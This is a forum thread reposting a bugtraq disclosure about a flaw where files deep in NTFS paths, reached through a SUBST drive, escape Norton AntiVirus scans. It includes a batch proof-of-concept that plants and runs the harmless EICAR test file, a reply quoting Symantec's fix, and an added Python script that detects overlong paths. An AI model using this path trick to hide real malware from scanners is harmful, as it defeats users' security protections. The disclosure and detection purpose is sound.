
Thread: Norton AntiVirus & NTFS Long pathname exploit

  1. #1 (Senior Member, joined Nov 2001, 1,255 posts)

    Norton AntiVirus & NTFS Long pathname exploit

    This was posted to bugtraq by Hans Somers on Jan 30th:

    ===BEGIN POST===

    Long path exploit on NTFS
    =========================
    The filesystem NTFS seems to be a hiding place for viruses if you use a file path which exceeds 256 characters.

    What is the case?
    The file path (drive + folder path + filename) can theoretically take up to 32000 characters if the filesystem in use is NTFS. However, in the way in which Windows NT (4.0, 2000 and XP) accesses this filesystem, a maximum of 256 characters is in place. If you try to go deeper, you will experience a "Path too long" error. In these operating systems there is a way to substitute a long folder path, using the "SUBST" command. If you change your current drive to the substituted drive, the path length is reset to 3 (Q:\ e.g.) and Windows NT allows you to create an even deeper path.
    Normally this would not alarm anyone; however, I discovered that my favorite virus scanner (Norton AntiVirus) was not able to follow the deep path where I created the EICAR test string. So I created a very simple batch file to demonstrate this exploit. My virus scanner will only find this virus if the SUBST drive is available during the scan.

    I have tested this on the following platforms:
    Windows NT 4.0 SP4
    Windows NT 4.0 SP6a
    Windows 2000 Professional SP2
    Windows XP Pro
    I have determined that the following versions of Norton AntiVirus will not follow the deep path during a complete scan:
    Norton AntiVirus 5.0
    Norton AntiVirus 7.5.1
    Norton Antivirus 8.00.58

    I suspect that other virus scanners will encounter the same "bug", so you might try the sample script that I created. Additionally, other tools (quota managers, inventory tools etc.) that gather information from an NTFS partition might reveal the same bug.

    After running the script below, remove the substituted drive (SUBST Q: /D) and run a full scan on your C partition. I suspect that the EICAR virus will not be found. Additionally, re-create the substituted drive and re-run the scan. Under normal conditions the EICAR virus will be found and removed (depending on your settings).

    As far as I can see, there is no real remedy against this exploit. I hope this message will pass through the proper channels, so the responsible parties will act on this.

    Responses on this posting at my address are welcome.

    Hans Somers (hans.somers@nl.abnamro.com)

    Sample script:
    ===========
    @echo off
    cls
    echo Start test-script NTFS-limit
    @echo Create a filepath to the limit of NTFS
    md c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
    cd c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
    @echo Create the Eicar test-string for PoC. This should be detected normally if you have an active virusscanner.
    rem %% and ^^ are batch escapes; the file receives a single % and ^ (the literal EICAR string)
    echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >EICAR.TXT
    echo. >>EICAR.TXT
    @echo Activate the Eicar test-string
    copy EICAR.TXT EICAR1.COM >NUL
    @echo Create a subst-drive Q: for this path
    subst Q: c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
    @echo Create an even deeper filepath (thus exceeding the limit of NTFS's explorer)
    md Q:\1234567890\1234567890\1234567890
    @echo Change current folder into "the deep"
    Q:
    cd Q:\1234567890\1234567890\1234567890
    @echo Create the Eicar test-string
    echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >EICAR.TXT
    echo. >>EICAR.TXT
    @echo Activate the Eicar test-string
    copy EICAR.TXT EICAR2.COM >NUL
    EICAR2.COM
    echo .
    echo End of test-script

    ===END POST===

    I'd like to reiterate that these are not my findings, I'm merely passing the information on to these forums.
    Chris Shepherd
    The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
    "Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?" -- Failed Insult
    Is your whole family retarded, or did they just catch it from you?

  2. #2 DjM (joined Aug 2001, location The Great White North, 1,867 posts)
    It seems Symantec may have already fixed this exposure in its NAVCE 7.51 Build 54. The following is quoted from their Platinum Support site.

    "Long Path names
    Symptom: Files and Folders with full path names longer than 259 characters would not be scanned, and no error was generated. In some cases, the client or server would crash.
    Solution: Additional error checking was added to detect these file names, log the error in the NAV and NT Event Logs (Scan Omission) and to ignore the scanning of the file to prevent crashes."

    DjM
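As an added example (not part of either post, and not Symantec's or Hans Somers' code), the Python script below models the scan omission both posts describe: it resolves a path seen through a SUBST drive back to its real path on the volume, flags anything beyond the 259-character Win32 limit quoted in DjM's reply, and on Windows walks a real tree with the \\?\ prefix to list such files. The SUBST table and file list are constructed to match the posted batch script.

```python
import ntpath
import os
import sys

# Win32 MAX_PATH is 260 including the terminating NUL, so 259 characters is the
# longest path a MAX_PATH-bound scanner opens (the figure in Symantec's note).
MAX_PATH_CHARS = 259

# Constructed SUBST table mirroring the posted script: Q: points at the 226-char
# directory its "md" line creates (19 x "1234567890" plus "123456789").
DEEP_BASE = r"c:\temp" + r"\1234567890" * 19 + r"\123456789"
SUBST_MAP = {"Q:": DEEP_BASE}

def resolve_subst(path, subst_map):
    """Rewrite a path on a SUBST drive to its real path on the host volume."""
    drive, rest = ntpath.splitdrive(path)  # e.g. 'Q:' and '\1234567890\...'
    target = subst_map.get(drive.upper())
    return path if target is None else target + rest

def scan_omissions(paths, subst_map, limit=MAX_PATH_CHARS):
    """Return (seen_path, real_path, length) for files whose real path exceeds
    the limit: what a MAX_PATH-bound scanner skips once the SUBST drive is gone."""
    omitted = []
    for seen in paths:
        real = resolve_subst(seen, subst_map)
        if len(real) > limit:
            omitted.append((seen, real, len(real)))
    return omitted

def walk_long_paths(root, limit=MAX_PATH_CHARS):
    """Walk a real directory tree and list the files beyond the limit."""
    # On Windows the \\?\ prefix lets Python itself follow paths past MAX_PATH.
    if sys.platform == "win32" and not root.startswith("\\\\?\\"):
        root = "\\\\?\\" + os.path.abspath(root)
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            visible = full[4:] if full.startswith("\\\\?\\") else full
            if len(visible) > limit:
                hits.append(visible)
    return hits

if __name__ == "__main__":
    # Constructed inputs: the two EICAR files the batch script creates.
    files = [DEEP_BASE + r"\EICAR1.COM",
             r"Q:\1234567890\1234567890\1234567890\EICAR2.COM"]
    for seen, real, n in scan_omissions(files, SUBST_MAP):
        print(f"omitted by a MAX_PATH scanner: {seen} ({n} chars on disk)")
```

On a Windows host, walk_long_paths(r"C:\") returns the files a MAX_PATH-bound tool never opens, which is the list to compare against the scanner's "Scan Omission" events.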
